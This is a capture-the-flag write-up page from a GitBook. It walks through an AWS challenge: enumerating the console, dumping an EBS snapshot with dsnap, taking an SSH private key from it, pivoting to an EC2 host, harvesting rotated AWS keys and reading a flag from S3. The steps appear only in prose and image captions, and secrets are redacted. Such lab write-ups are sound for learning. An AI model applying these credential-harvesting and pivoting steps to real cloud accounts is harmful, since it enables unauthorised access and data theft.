Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Solve
  • TLDR
  • Reference

Was this helpful?

  1. 2025
  2. Thuderdome

Pulled from the sky

PreviousEmerge through the breachNextAn absent defense

Last updated 3 months ago

Was this helpful?

Solve

Whilst on the AWS Console, lets utilize the Console User Interface to enumerate.

We identified that there are 2 EC2 instances running

  • admin 54.211.110.193

  • web-prod 44.208.228.94

As we do not have access to the EC2 machine via SSM, the second best option will be to look into the snapshot to see if theres any sensitive files inside.

First lets configure the credential we get from the previous flag, and verify that it is working properly.

Doing some manual enumeration of the file system, we found a few interesting files/folders

  • /home/nacer/.azure

  • /root/.aws/credentials

  • /home/nacer/.aws/credentials

However, when attempting to use those credentials, they are unusable, most likely due to them expiring or been rotated out.

However, I'm able to retrieve the private and public key in the /home/nacer/.ssh folder

Copying out the private key, lets attempt to use it to SSH into the web-prod server.

Recall how previously we tried using thne credentials that we have found in the docker container, but they were unusable, we have gotten our answer. The AWS Keys are set to rotate daily.

Lets copy out the current nacer key.

We have manged to then retrieve the flag succesfully from the s3 bucket.

TLDR

  • Enumerate AWS console with Haru Credentials

  • Identify EC2 running along with snapshots

  • Utilize dsnap to dump snapshot

  • Within the snapshot, contains a private key

  • Utilize the private key to SSH into the web-prod EC2 instance and get nacer access key id and access key secret

  • Retrieve flag from S3

Reference

Next, refering to and article, we will be dumping the snapshot. For the exact instruction on installing and utlizing dsnap, please refer to the article.

In , we have a S3 bucket that haru wasn't able to access. Lets try using nacer credentials to access the bucket now.

HackTricks
RhinoSecurityLabs
Flag 1
https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html
https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/
More IAM username added to loot
Policies, however we dont have permission to get the actual policy but good to take note
EC2 running instances
No permission over s3
AMI owned by haru
snapshot owned by haru
installing dsnap using pipx
downloading the snapshot using dsnap
building the docker container
running the docker container and dropping into a shell
nacer private key redacted
Succesful SSH
nacer aws credentials
able to list bucket
able to also get bucket objects
redacted flag.txt